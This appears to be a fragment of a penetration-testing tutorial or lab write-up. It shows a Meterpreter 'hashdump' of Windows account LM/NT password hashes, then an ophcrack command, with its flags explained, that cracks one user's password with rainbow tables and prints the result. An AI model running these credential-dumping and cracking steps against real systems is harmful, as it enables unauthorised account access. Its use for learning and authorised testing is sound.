meterpreter > hashdump Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4::: bobby:1004:d5fe21d304a98621a361a6c342c88aea:f6f385f51564ede6f6a511566226bb3c::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:8f0a7d45747f73566d5d9317db1bde5e:b0a63571f893c22d3dafdfcb472f4d3b::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:c9c30a2e99cdd9cdee684645d89e8512::: user:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: |
bobby:1004:d5fe21d304a98621a361a6c342c88aea:f6f385f51564ede6f6a511566226bb3c::: |
#ophcrack -g -d
./download/tables/ -t ./download/tables/ -f /admin/test-pwd.txt |
-g = disable gui -d = the directory with the rainbow tables -t = the tables to use -f = the file with the hashes |
#ophcrack -g -d
./download/tables/ -t ./download/tables/ -f /admin/test-pwd.txt 3 hashes have been found in /admin/test-pwd.txt. Opened 4 table(s) from ./download/tables/. 0h 0m 1s; Found password ESS for 2nd LM hash #0 0h 0m 30s; Found password N3V3RGU for 1st LM hash #0in table XP free fast #1 at column 4686. 0h 0m 30s; Found password n3v3rguess for user bobby (NT hash #0) 0h 0m 30s; search (100%); tables: total 4, done 0, using 4; pwd found 1/1. Results: username / hash LM password NT password bobby N3V3RGUESS n3v3rguess |